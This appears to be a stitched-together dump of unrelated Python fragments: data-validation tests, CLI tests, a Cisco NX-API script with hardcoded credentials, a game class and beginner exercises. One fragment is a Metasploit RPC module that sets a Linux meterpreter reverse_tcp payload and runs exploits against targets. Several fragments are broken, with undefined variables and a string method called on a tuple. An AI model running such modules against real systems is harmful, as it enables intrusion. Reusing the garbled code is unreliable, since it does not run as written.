titanic_profiled_evrs_1.results, "expect_column_to_exist", column_="SexCode"
)
print(found_evrs)
assert found_evrs == []
# TODO: _find_all_evrs_by_type should accept an ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
titanic_profiled_evrs_1.results,
"expect_column_distinct_values_to_be_in_set",
column_=None,
)
print(found_evrs)
assert len(found_evrs) == 4
# TODO: _find_all_evrs_by_type should accept an ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
titanic_profiled_evrs_1.results,
"expect_column_distinct_values_to_be_in_set",
column_="SexCode",
)
print(found_evrs)
assert len(found_evrs) == 1
def test__get_column_list_from_evrs(titanic_profiled_evrs_1):
column_list = Renderer()._get_column_list_from_evrs(titanic_profiled_evrs_1)
print(column_list)
assert column_list == [
"Unnamed: 0",
"Name",
"PClass",
"Age",
"Sex",
"Survived",
"SexCode",
]
|
python
|
from MyCodes.personal import title, inputInt, inputFloat
from urllib.request import urlopen
title('Exercício 113', 50, 34)
a = inputInt('Digite um valor inteiro: ')
b = inputFloat('Digite um valor real: ')
print(f'O valor inteiro é {a} e o valor real é {b:.1f}.')
title('Exercício 114', 50, 34)
try:
pag = urlopen('http://www.pudim.com.br/')
except:
print('\033[31mO site não está acessível!\033[m')
else:
print('\033[32mO site está acessível!\033[m')
|
python
|
# Copyright 2017 Gustavo Baratto. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class BaseStack(object):
""" Base class for different types of stacks.
"""
def __init__(self, **kwargs):
[setattr(self, k, v) for k, v in kwargs.items()]
def factory(**kwargs):
""" Factory for different types of stacks
Imports are being done here so SDKs for multiple providers don't need to
be installed if never used.
"""
# default type is Cloudformation
possible_stack_type_keys = ["StackType", "stack_type", "Type", "type"]
stack_keys = kwargs.keys()
for possible_stack_type in possible_stack_type_keys:
if possible_stack_type in stack_keys:
stack_type = kwargs.pop(possible_stack_type).lower()
break
else:
stack_type = "cloudformation"
if stack_type == "cloudformation":
import gpwm.stacks.aws
return gpwm.stacks.aws.CloudformationStack(**kwargs)
elif stack_type == "azure":
import gpwm.stacks.azure
return gpwm.stacks.azure.AzureStack(**kwargs)
elif stack_type == "shell":
import gpwm.stacks.shell
return gpwm.stacks.shell.ShellStack(**kwargs)
elif stack_type == "gcp":
import gpwm.stacks.gcp
return gpwm.stacks.gcp.GCPStack(**kwargs)
raise SystemExit("Stack type not supported: {}".format(stack_type))
|
python
|
from .block import *
from .chain import *
__version__ = "0.0.1"
|
python
|
import time
from multiprocessing.pool import ThreadPool
from core.events import EventHandler
from core.keystore import KeyStore as kb
from core.packetcap import pktcap
from core.actionModule import actionModule
from core.mymsf import myMsf
class msfActionModule(actionModule):
seentargets = dict()
def __init__(self, config, display, lock):
actionModule.__init__(self, config, display, lock)
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
def go(self, vector):
self.vector = vector
self.display.verbose("-> Running : " + self.getTitle())
self.display.debug("---> " + self.getDescription())
if not msf.isAuthenticated():
return
ret = self.process()
msf.cleanup()
return ret
def execMsf(self, target, cmds):
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
for line in cmds['config']:
if line == "SLEEP":
msf.sleep(int(self.config['msfexploitdelay']))
else:
msf.execute(line + "\n")
if cmds['payload'] == "none":
pass
elif cmds['payload'] == "win":
pass
elif cmds['payload'] == "linux":
msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp")
msf.execute("set LPORT 4445")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
#while (re.search(".*execution completed.*", result) is None):
# result = result + msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
return results, outfile
|
python
|
string = 'emir','zarina','baizak','nazira'
string = string.replace('emir','vanya')
print(string)
|
python
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
pytest.importorskip("ethosu.vela")
import tvm.contrib.ethosu.cascader as pl
from tvm.contrib.ethosu.cascader.parts import EthosuPart
def test_ethosu_part():
te_subgraph = pl.TESubgraph([], None)
output_quantum = [1, 2, 2, 8]
quantum_cycles = 32
propagator = pl.Propagator(
[[1, 0, 0, 0, 2], [0, 1, 0, 0, 2], [0, 0, 1, 0, 0], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]],
[0, 0, 0, 0],
)
stripe_config = pl.StripeConfig(
[1, 4, 4, 16], [1, 64, 72, 96], [1, 4, 4, 16], [1, 2, 3, 4], [1, 16, 13, 6], [0, 0, 0, 0]
)
part = EthosuPart(te_subgraph, [propagator], output_quantum, quantum_cycles)
assert part.get_stripe_align_hint() == output_quantum
# Check that the performance model runs, don't verify output
part.get_performance_info(stripe_config, False)
part.get_performance_info(stripe_config, True)
if __name__ == "__main__":
pytest.main([__file__])
|
python
|
import os
import tempfile
from pathlib import Path
from test.splitgraph.commands.test_commit_diff import _alter_diff_splitting_dataset
from test.splitgraph.conftest import API_RESOURCES, OUTPUT
from unittest import mock
from unittest.mock import call, patch, sentinel
import httpretty
import pytest
from click import ClickException
from click.testing import CliRunner
from splitgraph.commandline import (
cli,
config_c,
dump_c,
eval_c,
import_c,
prune_c,
rm_c,
upstream_c,
)
from splitgraph.commandline.common import ImageType, RepositoryType
from splitgraph.commandline.example import alter_c, generate_c, splitfile_c
from splitgraph.commandline.misc import (
_get_binary_url_for,
_get_download_paths,
_get_system_id,
upgrade_c,
)
from splitgraph.config import PG_PWD, PG_USER
from splitgraph.core.engine import repository_exists
from splitgraph.core.fragment_manager import FragmentManager
from splitgraph.core.repository import Repository
from splitgraph.engine import ResultShape
from splitgraph.exceptions import (
ImageNotFoundError,
RepositoryNotFoundError,
TableNotFoundError,
)
def test_image_spec_parsing():
assert ImageType()("test/pg_mount") == (Repository("test", "pg_mount"), "latest")
assert ImageType(default="HEAD")("test/pg_mount") == (Repository("test", "pg_mount"), "HEAD")
assert ImageType()("test/pg_mount:some_tag") == (Repository("test", "pg_mount"), "some_tag")
assert ImageType()("pg_mount") == (Repository("", "pg_mount"), "latest")
assert ImageType()("pg_mount:some_tag") == (Repository("", "pg_mount"), "some_tag")
assert ImageType(default="HEAD")("pg_mount:some_tag") == (
Repository("", "pg_mount"),
"some_tag",
)
def test_image_repo_parsing_errors(pg_repo_local):
repo = Repository("test", "pg_mount")
assert ImageType(get_image=True, default="latest")("test/pg_mount")[1] == repo.images["latest"]
assert (
ImageType(get_image=True, default="latest")("test/pg_mount:00000000")[1]
== repo.images["00000000"]
)
with pytest.raises(ImageNotFoundError):
ImageType(get_image=True, default="latest")("test/pg_mount:doesnt_exist")
with pytest.raises(RepositoryNotFoundError):
ImageType(get_image=True, default="latest")("test/doesntexist:latest")
with pytest.raises(RepositoryNotFoundError):
RepositoryType(exists=True)("test/doesntexist")
def test_upstream_management(pg_repo_local):
runner = CliRunner()
# sgr upstream test/pg_mount
result = runner.invoke(upstream_c, ["test/pg_mount"])
assert result.exit_code == 0
assert "has no upstream" in result.output
# Set to nonexistent engine
result = runner.invoke(upstream_c, ["test/pg_mount", "--set", "dummy_engine", "test/pg_mount"])
assert result.exit_code == 1
assert "Remote engine 'dummy_engine' does not exist" in result.output
# Set to existing engine (should we check the repo actually exists?)
result = runner.invoke(upstream_c, ["test/pg_mount", "--set", "remote_engine", "test/pg_mount"])
assert result.exit_code == 0
assert "set to track remote_engine:test/pg_mount" in result.output
# Get upstream again
result = runner.invoke(upstream_c, ["test/pg_mount"])
assert result.exit_code == 0
assert "is tracking remote_engine:test/pg_mount" in result.output
# Reset it
result = runner.invoke(upstream_c, ["test/pg_mount", "--reset"])
assert result.exit_code == 0
assert "Deleted upstream for test/pg_mount" in result.output
assert pg_repo_local.upstream is None
# Reset it again
result = runner.invoke(upstream_c, ["test/pg_mount", "--reset"])
assert result.exit_code == 1
assert "has no upstream" in result.output
@pytest.mark.mounting
def test_import(pg_repo_local, mg_repo_local):
runner = CliRunner()
head = pg_repo_local.head
# sgr import mountpoint, table, target_mountpoint (3-arg)
result = runner.invoke(import_c, [str(mg_repo_local), "stuff", str(pg_repo_local)])
assert result.exit_code == 0
new_head = pg_repo_local.head
assert new_head.get_table("stuff")
with pytest.raises(TableNotFoundError):
head.get_table("stuff")
# sgr import with alias
result = runner.invoke(
import_c, [str(mg_repo_local), "stuff", str(pg_repo_local), "stuff_copy"]
)
assert result.exit_code == 0
new_new_head = pg_repo_local.head
assert new_new_head.get_table("stuff_copy")
with pytest.raises(TableNotFoundError):
new_head.get_table("stuff_copy")
# sgr import with alias and custom image hash
mg_repo_local.run_sql("DELETE FROM stuff")
new_mg_head = mg_repo_local.commit()
result = runner.invoke(
import_c,
[
str(mg_repo_local) + ":" + new_mg_head.image_hash,
"stuff",
str(pg_repo_local),
"stuff_empty",
],
)
assert result.exit_code == 0
new_new_new_head = pg_repo_local.head
assert new_new_new_head.get_table("stuff_empty")
with pytest.raises(TableNotFoundError):
new_new_head.get_table("stuff_empty")
assert pg_repo_local.run_sql("SELECT * FROM stuff_empty") == []
# sgr import with query, no alias
result = runner.invoke(
import_c,
[
str(mg_repo_local) + ":" + new_mg_head.image_hash,
"SELECT * FROM stuff",
str(pg_repo_local),
],
)
assert result.exit_code != 0
assert "TARGET_TABLE is required" in str(result.stdout)
def test_rm_repositories(pg_repo_local, pg_repo_remote):
runner = CliRunner()
# sgr rm test/pg_mount, say "no"
result = runner.invoke(rm_c, [str(pg_repo_local)], input="n\n")
assert result.exit_code == 1
assert "Repository test/pg_mount will be deleted" in result.output
assert repository_exists(pg_repo_local)
# sgr rm test/pg_mount, say "yes"
result = runner.invoke(rm_c, [str(pg_repo_local)], input="y\n")
assert result.exit_code == 0
assert not repository_exists(pg_repo_local)
# sgr rm test/pg_mount -r remote_engine
result = runner.invoke(rm_c, [str(pg_repo_remote), "-r", "remote_engine"], input="y\n")
assert result.exit_code == 0
assert not repository_exists(pg_repo_remote)
def test_rm_images(pg_repo_local_multitag, pg_repo_remote_multitag):
# Play around with both engines for simplicity -- both have 2 images with 2 tags
runner = CliRunner()
local_v1 = pg_repo_local_multitag.images["v1"].image_hash
local_v2 = pg_repo_local_multitag.images["v2"].image_hash
# Test deleting checked out image causes an error
result = runner.invoke(rm_c, [str(pg_repo_local_multitag) + ":v2"])
assert result.exit_code != 0
assert "do sgr checkout -u test/pg_mount" in str(result.exc_info)
pg_repo_local_multitag.uncheckout()
# sgr rm test/pg_mount:v2, say "no"
result = runner.invoke(rm_c, [str(pg_repo_local_multitag) + ":v2"], input="n\n")
assert result.exit_code == 1
# Specify most of the output verbatim here to make sure it's not proposing
# to delete more than needed (just the single image and the single v2 tag)
assert (
"Images to be deleted:\n" + local_v2 + "\nTotal: 1\n\nTags to be deleted:\nv2\nTotal: 1"
in result.output
)
# Since we cancelled the operation, 'v2' still remains.
assert pg_repo_local_multitag.images["v2"].image_hash == local_v2
assert pg_repo_local_multitag.images[local_v2] is not None
# Uncheckout the remote too (it's supposed to be bare anyway)
remote_v2 = pg_repo_remote_multitag.images["v2"].image_hash
pg_repo_remote_multitag.uncheckout()
# sgr rm test/pg_mount:v2 -r remote_engine, say "yes"
result = runner.invoke(
rm_c, [str(pg_repo_remote_multitag) + ":v2", "-r", "remote_engine"], input="y\n"
)
assert result.exit_code == 0
assert pg_repo_remote_multitag.images.by_tag("v2", raise_on_none=False) is None
with pytest.raises(ImageNotFoundError):
pg_repo_remote_multitag.images.by_hash(remote_v2)
# sgr rm test/pg_mount:v1 -y
# Should delete both images since v2 depends on v1
result = runner.invoke(rm_c, [str(pg_repo_local_multitag) + ":v1", "-y"])
assert result.exit_code == 0
assert local_v2 in result.output
assert local_v1 in result.output
assert "v1" in result.output
assert "v2" in result.output
# One image remaining (the 00000.. base image)
assert len(pg_repo_local_multitag.images()) == 1
def test_prune(pg_repo_local_multitag, pg_repo_remote_multitag):
runner = CliRunner()
# Two engines, two repos, two images in each (tagged v1 and v2, v1 is the parent of v2).
pg_repo_remote_multitag.uncheckout()
# sgr prune test/pg_mount -- all images are tagged, nothing to do.
result = runner.invoke(prune_c, [str(pg_repo_local_multitag)])
assert result.exit_code == 0
assert "Nothing to do" in result.output
# Delete tag v2 and run sgr prune -r remote_engine test/pg_mount, say "no": the image
# that used to be 'v2' now isn't tagged so it will be a candidate for removal (but not the v1 image).
remote_v2 = pg_repo_remote_multitag.images["v2"]
remote_v2.delete_tag("v2")
pg_repo_remote_multitag.commit_engines()
result = runner.invoke(
prune_c, [str(pg_repo_remote_multitag), "-r", "remote_engine"], input="n\n"
)
assert result.exit_code == 1 # Because "n" aborted the command
assert remote_v2.image_hash in result.output
assert "Total: 1" in result.output
# Make sure the image still exists
assert pg_repo_remote_multitag.images.by_hash(remote_v2.image_hash)
# Delete tag v1 and run sgr prune -r remote_engine -y test_pg_mount:
# now both images aren't tagged so will get removed.
remote_v1 = pg_repo_remote_multitag.images["v1"]
remote_v1.delete_tag("v1")
pg_repo_remote_multitag.commit_engines()
result = runner.invoke(prune_c, [str(pg_repo_remote_multitag), "-r", "remote_engine", "-y"])
assert result.exit_code == 0
assert remote_v2.image_hash in result.output
assert remote_v1.image_hash in result.output
# 2 images + the 000... image
assert "Total: 3" in result.output
assert not pg_repo_remote_multitag.images()
# Finally, delete both tags from the local engine and prune. Since there's still
# a HEAD tag pointing to the ex-v2, nothing will actually happen.
result = runner.invoke(prune_c, [str(pg_repo_local_multitag), "-y"])
assert "Nothing to do." in result.output
# 2 images + the 000.. image
assert len(pg_repo_local_multitag.images()) == 3
assert len(pg_repo_local_multitag.get_all_hashes_tags()) == 3
def test_config_dumping():
runner = CliRunner()
# sgr config (normal, with passwords shielded)
result = runner.invoke(config_c, catch_exceptions=False)
assert result.exit_code == 0
assert PG_PWD not in result.output
assert "remote_engine:" in result.output
assert ("SG_ENGINE_USER=%s" % PG_USER) in result.output
assert "DUMMY=test.splitgraph.splitfile" in result.output
assert "S3=splitgraph.hooks.s3" in result.output
# sgr config -s (no password shielding)
result = runner.invoke(config_c, ["-s"])
assert result.exit_code == 0
assert ("SG_ENGINE_USER=%s" % PG_USER) in result.output
assert ("SG_ENGINE_PWD=%s" % PG_PWD) in result.output
assert "remote_engine:" in result.output
# sgr config -sc (no password shielding, output in config format)
result = runner.invoke(config_c, ["-sc"])
assert result.exit_code == 0
assert ("SG_ENGINE_USER=%s" % PG_USER) in result.output
assert ("SG_ENGINE_PWD=%s" % PG_PWD) in result.output
assert "[remote: remote_engine]" in result.output
assert "[defaults]" in result.output
assert "[commands]" in result.output
assert "[external_handlers]" in result.output
assert "[data_sources]" in result.output
assert "S3=splitgraph.hooks.s3" in result.output
# sgr config -n (print connection string to engine)
result = runner.invoke(config_c, ["-n"])
assert result.output == "postgresql://sgr:supersecure@localhost:5432/splitgraph\n"
def test_examples(local_engine_empty):
# Test the example-generating commands used in the quickstart
runner = CliRunner()
result = runner.invoke(generate_c, ["example/repo_1"])
assert result.exit_code == 0
repo = Repository.from_schema("example/repo_1")
assert len(repo.images()) == 2
assert repo.run_sql("SELECT COUNT(*) FROM demo", return_shape=ResultShape.ONE_ONE) == 10
assert repo.diff("demo", repo.head, None, aggregate=True) == (0, 0, 0)
result = runner.invoke(alter_c, ["example/repo_1"])
assert result.exit_code == 0
assert len(repo.images()) == 2
assert repo.diff("demo", repo.head, None, aggregate=True) == (2, 2, 2)
result = runner.invoke(splitfile_c, ["example/repo_1", "example/repo_2"])
assert result.exit_code == 0
assert "FROM example/repo_1 IMPORT demo AS table_1" in result.stdout
assert "FROM example/repo_2:${IMAGE_2} IMPORT demo AS table_2" in result.stdout
def test_commandline_dump_load(pg_repo_local):
pg_repo_local.run_sql("ALTER TABLE fruits ADD PRIMARY KEY (fruit_id)")
pg_repo_local.commit()
pg_repo_local.run_sql("INSERT INTO fruits VALUES (3, 'mayonnaise')")
pg_repo_local.commit()
pg_repo_local.run_sql("UPDATE fruits SET name = 'banana' WHERE fruit_id = 1")
pg_repo_local.commit()
pg_repo_local.head.tag("test_tag")
runner = CliRunner()
result = runner.invoke(dump_c, [str(pg_repo_local)], catch_exceptions=False)
assert result.exit_code == 0
dump = result.stdout
# Now delete the repo and try loading the dump to test it actually works.
pg_repo_local.delete()
pg_repo_local.objects.cleanup()
pg_repo_local.engine.run_sql(dump)
pg_repo_local.images["test_tag"].checkout()
assert pg_repo_local.run_sql("SELECT * FROM fruits ORDER BY fruit_id") == [
(1, "banana"),
(2, "orange"),
(3, "mayonnaise"),
]
def test_commandline_eval():
runner = CliRunner()
result = runner.invoke(eval_c, ["print()"], input="n\n", catch_exceptions=False)
assert result.exit_code == 1
assert "Aborted!" in result.output
result = runner.invoke(
eval_c,
[
"assert Repository.from_schema('test/repo').namespace == 'test';"
"assert object_manager is not None; print('arg_1=%s' % arg_1)",
"--arg",
"arg_1",
"val_1",
"--i-know-what-im-doing",
],
catch_exceptions=False,
)
assert result.exit_code == 0
assert "arg_1=val_1" in result.output
_GH_TAG = "https://api.github.com/repos/splitgraph/splitgraph/releases/tags/v0.1.0"
_GH_LATEST = "https://api.github.com/repos/splitgraph/splitgraph/releases/latest"
_GH_NONEXISTENT = "https://api.github.com/repos/splitgraph/splitgraph/releases/tags/vnonexistent"
def _gh_response(request, uri, response_headers):
with open(os.path.join(API_RESOURCES, "github_releases.json")) as f:
return [200, response_headers, f.read()]
def _gh_404(request, uri, response_headers):
return [404, response_headers, ""]
@httpretty.activate(allow_net_connect=False)
@pytest.mark.parametrize(
("system", "release", "result"),
[
(
"linux",
"latest",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-linux-x86_64",
),
),
(
"linux",
"v0.1.0",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-linux-x86_64",
),
),
(
"osx",
"latest",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-osx-x86_64",
),
),
(
"windows",
"latest",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-windows-x86_64.exe",
),
),
("windows", "vnonexistent", ValueError),
("weirdplatform", "v0.1.0", ValueError),
],
)
def test_get_binary_url(system, release, result):
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_TAG, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_LATEST, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_NONEXISTENT, body=_gh_404)
if result == ValueError:
with pytest.raises(result):
_get_binary_url_for(system, release)
else:
assert _get_binary_url_for(system, release) == result
def test_system_id_not_exists():
with mock.patch("splitgraph.commandline.misc.platform.system", return_value="TempleOS"):
with pytest.raises(ClickException):
_get_system_id()
@pytest.mark.parametrize(
("path", "final_path"),
[
("/home/user/", "/home/user/sgr"),
("/home/user/sgr_dest", "/home/user/sgr_dest"),
(None, "/usr/local/bin/sgr"),
],
)
def test_get_download_paths(fs_fast, path, final_path):
Path("/home/user/").mkdir(parents=True)
with mock.patch("splitgraph.commandline.misc.sys") as m_sys:
m_sys.executable = "/usr/local/bin/sgr"
temp_path_actual, final_path_actual = _get_download_paths(
path, "https://some.url.com/assets/sgr"
)
assert str(final_path_actual) == final_path
@httpretty.activate(allow_net_connect=False)
def test_upgrade_end_to_end():
_BODY = "new sgr client"
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_TAG, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_LATEST, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_NONEXISTENT, body=_gh_404)
httpretty.register_uri(
httpretty.HTTPretty.GET,
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-linux-x86_64",
body=_BODY,
adding_headers={"Content-Length": len(_BODY)},
)
runner = CliRunner()
# Patch a lot of things
with tempfile.TemporaryDirectory() as dir:
with open(os.path.join(dir, "sgr"), "w") as f:
f.write("old sgr client")
_module = "splitgraph.commandline.misc"
with mock.patch(_module + ".sys") as m_sys:
m_sys.executable = os.path.join(dir, "sgr")
m_sys.frozen = True
with mock.patch(_module + ".platform.system", return_value="Linux"):
with mock.patch(_module + ".subprocess.check_call") as subprocess:
with mock.patch(_module + ".list_engines", return_value=[sentinel.engine]):
with mock.patch("splitgraph.commandline.misc.atexit.register") as register:
result = runner.invoke(upgrade_c, ["--force"], catch_exceptions=False)
assert result.exit_code == 0
print(result.output)
assert subprocess.mock_calls == [
call([mock.ANY, "--version"]),
call([mock.ANY, "engine", "upgrade"]),
]
# Call the atexit callback that swaps the new sgr in and check it does that correctly.
# mock_calls is a list of tuples (name, args, kwargs), so grab the first arg
finalize_callback = register.mock_calls[-1][1][0]
assert finalize_callback.__name__ == "_finalize"
finalize_callback()
with open(os.path.join(dir, "sgr")) as f:
assert f.read() == "new sgr client"
with open(os.path.join(dir, "sgr.old")) as f:
assert f.read() == "old sgr client"
def test_rollback_on_error(local_engine_empty):
# For e.g. commit/checkout/other commands, we don't do commits/rollbacks
# in the library itself and expect the caller to manage transactions. In CLI,
# we need to make sure that erroneous transactions (e.g. interrupted SG commits)
# are rolled back correctly instead of being committed.
runner = CliRunner()
OUTPUT.init()
OUTPUT.run_sql("CREATE TABLE test (key INTEGER PRIMARY KEY, value_1 VARCHAR, value_2 INTEGER)")
for i in range(11):
OUTPUT.run_sql("INSERT INTO test VALUES (%s, %s, %s)", (i + 1, chr(ord("a") + i), i * 2))
OUTPUT.commit(chunk_size=5, in_fragment_order={"test": ["key", "value_1"]})
assert len(OUTPUT.images()) == 2
assert len(OUTPUT.objects.get_all_objects()) == 3
_alter_diff_splitting_dataset()
OUTPUT.commit_engines()
# Simulate the commit getting interrupted by the first object going through and being
# recorded, then a KeyboardInterrupt being raised.
called_once = False
def interrupted_register(*args, **kwargs):
nonlocal called_once
if called_once:
raise BaseException("something went wrong")
else:
called_once = True
return FragmentManager._register_object(*args, **kwargs)
with patch(
"splitgraph.core.fragment_manager.FragmentManager._register_object",
side_effect=interrupted_register,
) as ro:
with pytest.raises(BaseException):
runner.invoke(cli, ["commit", OUTPUT.to_schema()])
# Check that no image/object metadata was written
assert len(OUTPUT.images()) == 2
assert len(OUTPUT.objects.get_all_objects()) == 3
assert ro.call_count == 2
# Check that the data in the audit trigger wasn't deleted
assert len(OUTPUT.engine.get_pending_changes(OUTPUT.to_schema(), table="test")) == 6
|
python
|
name = "CheeseBurger"
|
python
|
import json
import requests
from requests.auth import HTTPBasicAuth as BasicAuth
from requests.packages import urllib3
from urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings(InsecureRequestWarning)
url = "https://sbx-nxos-mgmt.cisco.com:443/ins"
username = "admin"
password = "Admin_1234!"
data = {
"ins_api": {
"version": "1.0",
# Possible values:
# 1- cli_show
# 2- cli_show_array (For multiple show commands at once)
# 3- cli_show_ascii
# 4- cli_conf
"type": "cli_show",
"chunk": "0",
"sid": "1",
"input": "show vlan brief", # any command
"output_format": "json", # or XML
}
}
# POST: Request
response = requests.post(
url=url,
auth=BasicAuth(username, password),
json=data,
verify=False,
)
vlan_brief = response.json()
# Export response to a JSON file
with open(file="vlan-brief-output.json", mode="w") as outfile:
json.dump(obj=vlan_brief, fp=outfile, indent=4)
print("Done")
|
python
|
# Generated by Django 2.1 on 2019-05-15 22:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main_app', '0006_deviceconfig_last_modify'),
]
operations = [
migrations.AlterField(
model_name='deviceconfig',
name='last_modify',
field=models.DateTimeField(null=True),
),
]
|
python
|
class Diplomacy:
"""
Respresents every player diplomacy stances with others
"""
def __init__(self, stances=None):
"""
Initialize Diplomacy
Args:
stances (list(int)): stances with other player
Note:
there's 8 stances with other players
"""
if stances is None:
stances = [3] * 17
self.stances = stances
self.gaia = [0] * 17
def __repr__(self):
name = "Diplomacy:\n"
stances = "\t"
for ind in range(len(self.stances)):
stances += "P{}: {}; ".format(ind, self.stances[ind])
return name + stances
def __setitem__(self, playerIndex, stance):
"""
Todo:
describe method
"""
self.stances[playerIndex] = stance
def __getitem__(self, playerIndex):
"""
Get diplomacy stance with another player
Args:
playerIndex (int): index of another player
Return:
(int): player stance (0=allied, 1=neutral, 3=enemy)
"""
return self.stances[playerIndex]
def toJSON(self):
"""return JSON"""
data = dict()
for i in range(len(self.stances)):
data[i] = self.stances[i]
return data
def allStances(self, stance):
"""
Set diplomacy stance with all players
Args:
stance (int): diplomacy stance
"""
for i in range(len(self.stances)):
self.stances[i] = stance
def getPlayersByStance(self, stance):
"""
Get Players, which have selected stance
Args:
stance (int): 0=allied, 1=neutral, 3=enemy
Return:
(list(int)): player indexes, which have selected stance
Todo:
describe param stance
"""
result = list()
for ind in range(len(self.stances)):
if self.stances[ind] == stance:
result.append(ind)
return result
def allies(self):
"""
Get all players indexes with ally stance (0)
Return:
(list(int)): player indexes, which are allies
"""
return self.getPlayersByStance(0)
def neutrals(self):
"""
Get all players indexes with neutral stance (1)
Return:
(list(int)): player indexes, which are neutrals
"""
return self.getPlayersByStance(1)
def enemies(self):
"""
Get all players indexes with enemy stance (2)
Return:
(list(int)): player indexes, which are enemies
"""
return self.getPlayersByStance(3)
|
python
|
from portfolyo import dev, testing
from portfolyo.tools import frames
from numpy import nan
import portfolyo as pf
import numpy as np
import pandas as pd
import pytest
@pytest.mark.parametrize("series_or_df", ["series", "df"])
@pytest.mark.parametrize("bound", ["right", "left"])
@pytest.mark.parametrize(
("in_vals_num_specialconditions", "start"), # normal, WT->ST, ST->WT
[(96, "2020-03-01"), (92, "2020-03-29"), (100, "2020-10-25")],
)
@pytest.mark.parametrize("in_aware", [True, False])
@pytest.mark.parametrize("in_tz", ["Europe/Berlin", "Asia/Kolkata"])
@pytest.mark.parametrize("force", ["agnostic", "aware"])
@pytest.mark.parametrize("freq", ["15T", "D"])
def test_standardize(
in_vals_num_specialconditions: int,
start: str,
bound: str,
in_aware: bool,
in_tz: str,
series_or_df: str,
force: str,
freq: str,
):
"""Test if series and dataframes are correctly standardized to tz-aware, for
quarterhour timeseries with/without DST."""
if not in_aware and in_tz != "Europe/Berlin":
return # cannot convert tz-naive fr to different timezone
if freq == "D":
in_vals_num = 200
elif force == "agnostic" and in_tz != "Europe/Berlin":
in_vals_num = 96
else:
in_vals_num = in_vals_num_specialconditions
in_vals = np.random.random(in_vals_num)
# Prepare expected output frame.
out_tz = "Europe/Berlin" if force == "aware" else None
if force == "aware" or freq == "D":
out_vals = in_vals
else: # always return 96 values
a, b = (12, -84) if in_vals_num_specialconditions == 100 else (8, -88)
out_vals = [*in_vals[:a], *in_vals[b:]]
iout = pd.date_range(start, freq=freq, periods=len(out_vals), tz=out_tz)
expected = pd.Series(out_vals, iout.rename("ts_left"))
if series_or_df == "df":
expected = pd.DataFrame({"a": expected})
# Prepare input frame.
if force == "aware":
out_tz = "Europe/Berlin"
else:
out_tz = in_tz
iin = pd.date_range(start, freq=freq, periods=len(in_vals), tz=out_tz)
if out_tz != in_tz and freq == "D":
return # cannot test because not at day boundary.
iin = iin.tz_convert(in_tz).rename("the_time_stamp")
if not in_aware:
iin = iin.tz_localize(None)
if bound == "right":
td = pd.Timedelta(hours=24 if freq == "D" else 0.25)
iin = pd.DatetimeIndex([*iin[1:], iin[-1] + td])
kw = {"bound": bound, "floating": False, "tz": out_tz}
# Do actual tests.
if isinstance(expected, pd.Series):
# 1: Using expected frame: should stay the same.
result = frames.standardize(expected, force)
pd.testing.assert_series_equal(result, expected)
# 2: Series.
result = frames.standardize(pd.Series(in_vals, iin), force, **kw)
pd.testing.assert_series_equal(result, expected)
else:
# 1: Using expected frame: should stay the same.
result = frames.standardize(expected, force)
pd.testing.assert_frame_equal(result, expected)
# 2: Dataframe with index.
result = frames.standardize(pd.DataFrame({"a": in_vals}, iin), force, **kw)
pd.testing.assert_frame_equal(result, expected)
# 3: Dataframe with column that must become index.
result = frames.standardize(
pd.DataFrame({"a": in_vals, "t": iin}), force, index_col="t", **kw
)
pd.testing.assert_frame_equal(result, expected)
@pytest.mark.parametrize("series_or_df", ["series", "df"])
@pytest.mark.parametrize("removesome", [0, 1, 2]) # 0=none, 1=from end, 2=from middle
@pytest.mark.parametrize("tz", [None, "Europe/Berlin", "Asia/Kolkata"])
@pytest.mark.parametrize("floating", [True, False])
@pytest.mark.parametrize("bound", ["left", "right"])
@pytest.mark.parametrize("freq", [*pf.FREQUENCIES, "Q", "30T", "M", "AS-FEB"])
def test_standardizeawere_error(freq, tz, removesome, floating, series_or_df, bound):
"""Test raising errors on incorrect frequencies or indices with gaps."""
must_raise = False
# Get index.
while True:
i = dev.get_index(freq, tz)
if len(i) > 10:
break
# If no timezone specified and below-daily values, the created index will have too few/many datapoints.
if not tz and pf.freq_up_or_down(freq, "D") > 1:
return # don't check this edge case
